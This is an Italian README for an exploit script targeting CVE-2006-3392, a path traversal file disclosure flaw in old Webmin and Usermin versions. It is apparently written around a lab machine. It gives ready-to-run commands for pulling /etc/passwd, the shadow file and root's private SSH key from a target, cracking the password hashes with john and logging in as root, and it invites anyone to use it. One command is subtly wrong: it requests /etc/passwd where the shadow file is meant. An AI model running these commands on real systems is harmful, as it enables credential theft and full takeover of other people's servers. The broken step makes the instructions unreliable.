
Webmin < 1.290 / Usermin < 1.220 - Divulgazione arbitraria di file
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin prima della versione 1.290 e Usermin prima della versione 1.220 chiamano la funzione simplify_path prima di decodificare l'HTML, il che consente a un utente malintenzionato remoto di leggere file arbitrari, come dimostrato utilizzando sequenze "..%01", che bypassano la rimozione delle sequenze "../" prima che byte come "%01" vengano rimossi dal nome del file. NOTA: Questo è un problema diverso da CVE-2006-3274.
Sfoglia qualsiasi file nel filesystem con privilegi di root
./exploit.sh <ip target> <porta target> <file da divulgare>
Sfoglia passwd e shadow su 10.10.11.105, elimina l'ombra e cracka gli hash
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<la tua wordlist preferita qui> unshadowed
Sfoglia la chiave rsa privata su 10.10.11.105
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
Sentiti libero di utilizzare o modificare quando e dove vuoi.